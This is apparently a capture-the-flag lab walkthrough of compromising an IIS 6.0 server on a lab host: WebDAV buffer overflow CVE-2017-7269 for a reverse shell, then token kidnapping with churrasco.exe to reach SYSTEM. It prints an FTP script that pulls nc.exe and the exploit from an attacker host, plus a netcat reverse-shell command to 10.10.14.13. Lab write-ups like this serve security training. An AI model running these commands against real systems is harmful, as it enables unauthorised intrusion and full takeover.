Machine Overview
We discovered an IIS 6.0 web server exposing HTTP (port 80). The server is vulnerable to a WebDAV buffer overflow (CVE-2017-7269) that allows remote code execution; we used a public PoC to get a reverse shell as NT AUTHORITY\NETWORK SERVICE. The machine had SeImpersonatePrivilege enabled, enabling a token-kidnapping style escalation on Windows Server 2003. After transferring a privilege-escalation binary via FTP and running it, we obtained a SYSTEM shell (NT AUTHORITY\SYSTEM) and retrieved the user and root flags.
Enumeration
Nmap Scan
We begin with a service scan to enumerate open ports:
nmap -sC -sV -A -Pn -oN nmap.txt 10.10.10.14
# nmap version: 7.93Scan Results:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_ Server Date: Sat, 11 Oct 2025 16:44:03 GMT
|_http-title: Under Construction
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCHWeb Enumeration
Checking the server header with curl:
$ curl -I http://10.10.10.14
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NETThat confirms we are dealing with Microsoft IIS 6.0.
Navigating to http://10.10.10.14 reveals an under construction page:
Vulnerability Analysis
A search for IIS 6.0 WebDAV issues yields CVE-2017-7269, a buffer overflow in the WebDAV extension (function ScStoragePathFromUrl) that can be triggered with a specially crafted HTTP request. This allows remote code execution on unpatched IIS 6.0 servers. For more information, see F5 Labs cve-2017-7269.
Exploitation
We used a public PoC exploit that sends a crafted WebDAV request and drops a reverse shell:
python3 iis6_reverse_shell.py 10.10.10.14 80 <reverse_ip> <reverse_port>Setting up the listener:
nc -lnvp <reverse_port>Netcat Output:
$ whoami
nt authority\network serviceWe had a shell as nt authority\network service.
Privilege Escalation
System information:
$ systeminfo
# OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
# OS Version: 5.2.3790 Service Pack 2 Build 3790We checked available privileges to guide escalation:
whoami /privOutput:
SeImpersonatePrivilege Enabled
SeChangeNotifyPrivilege Enabled
...SeImpersonatePrivilege is enabled — this allows token impersonation attacks (Token Kidnapping) on Windows Server 2003.
Token Kidnapping
Windows Server 2003 is susceptible to token-kidnapping style escalation if a process with SeImpersonatePrivilege can steal a token from a SYSTEM process. We used the public exploit referenced on Exploit-DB 6705 — commonly packaged as churrasco.exe in some repos — to perform the token steal and spawn a SYSTEM shell.
Transfer of exploit and netcat
SMB was not available from the target (attempts failed with a error message), so we used ftp to transfer files:
Create ftp.txt script:
echo open 10.10.14.13 21 > ftp.txt & echo USER anonymous >> ftp.txt & echo anonymous >> ftp.txt & echo bin >> ftp.txt & echo GET nc.exe >> ftp.txt & echo GET churrasco.exe >> ftp.txt & echo bye >> ftp.txt
ftp -v -n -s:ftp.txtExecute the token-kidnapper and spawn a reverse shell:
churrasco.exe -d "C:\wmpub\nc.exe 10.10.14.13 5555 -e cmd.exe"Thanks to 0xveera for the helpful tip about using FTP to transfer exploits.
Setting up the listener:
nc -lnvp 5555We received a SYSTEM shell:
$ whoami
nt authority\systemUser & Root Flags
- User:
C:\Documents and Settings\Harry\Desktop\user.txt - Root:
C:\Documents and Settings\Administrator\Desktop\root.txt